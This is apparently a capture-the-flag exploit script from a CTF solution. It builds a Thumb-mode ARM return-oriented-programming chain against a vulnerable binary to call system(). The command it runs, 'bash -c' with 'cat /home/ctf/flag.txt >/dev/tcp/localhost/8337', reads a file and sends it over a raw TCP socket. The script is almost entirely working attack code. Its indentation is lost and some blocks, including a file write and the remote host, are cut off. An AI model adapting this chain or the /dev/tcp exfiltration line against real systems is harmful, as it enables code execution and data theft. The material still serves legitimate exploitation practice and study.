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Created June 19, 2023 08:35
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indore ctf pwn Lengan
#!/usr/bin/env python3
from pwn import *
context.binary = "./main_fixed"
# rops
rop_mov_r0_r6_t_adr = 0x00010d2c # ; mov r0,r6 / pop {r4, r5, r6, pc}
rop_add_r0_r4_t_adr = 0x0001fd74 # ; add r0, r4 / pop {r4, pc}
rop_pop_lr_t_adr = 0x00045f5a # ; pop.w {r4, lr} / nop.w / pop {r4, pc}
rop_ror_r0_t_adr = 0x0001db28 # ; rors r0, r6 / bx r3
rop_mov_r1_r0_t_adr = 0x0001eb0e # ; movs r1, r0 / bx lr
rop_add_r1_r3_b_t_adr = 0x0003de3e # add r1, r3 / blx r1
rop_set_r3_t_adr = 0x00014c28 # ; pop {r3, pc}
rop_system_t_adr = 0x00014c10 # system
rop_exit_t_adr = 0x00014358 # exit fkt
location_bin_sh = 0x0004b004 # string "/bin/sh"
location_date = 0x0004ab60 # string "date +'%s'"
def build_add_r0_r4_t(r4=0):
payload = p32(rop_add_r0_r4_t_adr + 1)
payload += p32(r4)
return payload
def build_lr(lr, r4=0):
payload = p32(rop_pop_lr_t_adr + 1)
payload += p32(0) + p32(lr) + p32(r4)
return payload
def build_mov_r0_r6_t(r4=0, r5=0, r6=0):
payload = p32(rop_mov_r0_r6_t_adr + 1)
payload += p32(r4) + p32(r5) + p32(r6)
return payload
# config of command
addr, port = ("localhost", 8337) # our server
cmd = "cat /home/ctf/flag.txt"
cmd_net_wrap = f"bash -c \"{cmd} >/dev/tcp/{addr}/{port}\""
print("cmd:", cmd_net_wrap)
cmd_net_wrap = cmd_net_wrap.encode("ascii")
# build payload
# all instructinos here have a +1 as that indicates thumb mode for
# arm. It does seem that switching to thumb requires special instructions,
# but switching out of it is possible with write to $pc
def build_payload():
# padding until pc
payload = b"0" * 0x20
payload += b"1" * 4 # r7
# move r6 to r0 and set r4 with r6
# - r6 contains a reachable offset on the stack from our $sp
# - r6 is used for right shift
# - r4 is an arbitrary offset to allow more rop stack until our "data" section
payload += build_mov_r0_r6_t(r4=40, r6=8)
# move our "data" section by r4 steps on the stack
payload += build_add_r0_r4_t()
# this is so cursed, the idea is to have the application fail with
# a signal (e.g. illegial instruction) when the system call didn't exit with
# a zero return code. In case system was successful we shutdown gracefully.
# as system is stack canary protected, we can't call into it.
# As such we need to conform to arm calling convetion and set the lr register appropriately
payload += build_lr(rop_set_r3_t_adr + 1)
# input of system() is the command. See below
payload += p32(rop_system_t_adr + 1)
payload += p32(rop_set_r3_t_adr + 1)
payload += p32(rop_ror_r0_t_adr + 1)
payload += p32(rop_exit_t_adr + 1)
payload += p32(rop_pop_lr_t_adr + 1)
payload += p32(0) + p32(rop_add_r1_r3_b_t_adr + 1) + p32(0)
payload += p32(rop_mov_r1_r0_t_adr + 1)
# Order of execution
# 1. rop_system_t_adr
# 2. rop_set_r3_t_adr
# - set r3 to rop_set_r3_t_adr
# 3. rop_ror_r0_t_adr
# - r0 >> 8
# - jmp to r3
# 3. rop_set_r3_t_adr
# - set r3 to rop_exit_t_adr (graceful shutdown)
# 4. rop_pop_lr_t_adr
# - set lr register to rop_add_r1_r3_b_t_adr
# 5. rop_mov_r1_r0_t_adr
# - set r1 to r0[our exit code]
# 6. rop_add_r1_r3_b_t_adr
# - add r1 to r3
# - jump to r3
# -> if r0 = 0: r3 = rop_exit_t_adr
# -> if r0 != 0: r3 will be bricked
# this is ofc not a perfect solution, but it works for most errors
print(len(payload)) # just a small bounds check
# fill the remaining space so that our command is put into it correctly
payload += b"0" * ((40 + 40) - (len(payload) - 0x20))
payload += cmd_net_wrap + b"\x00" # command as null terminated string
print(f"Payload Length: {len(payload)}")
# our rop stack cannot be to large, as we will overwrite important
# data that is needed for system call (i.e. dump of env variables).
# The address is 340 bytes from our initial $sp
assert(len(payload) < 340)
return payload
payload = build_payload()
with open("/local-tmp/payload", "bw") as fp:
if True:
r = remote("", 2222, ssl=False)
#io = gdb.debug(context.binary.path, gdbscript="""
#source /home/elizabeth/Documents/Projects/ccc/ctfriday-bsidesindore23/pwndbg/
#b *0x00021dac
#b *0x010488
#b *0x00014c10
io = process(context.binary.path)
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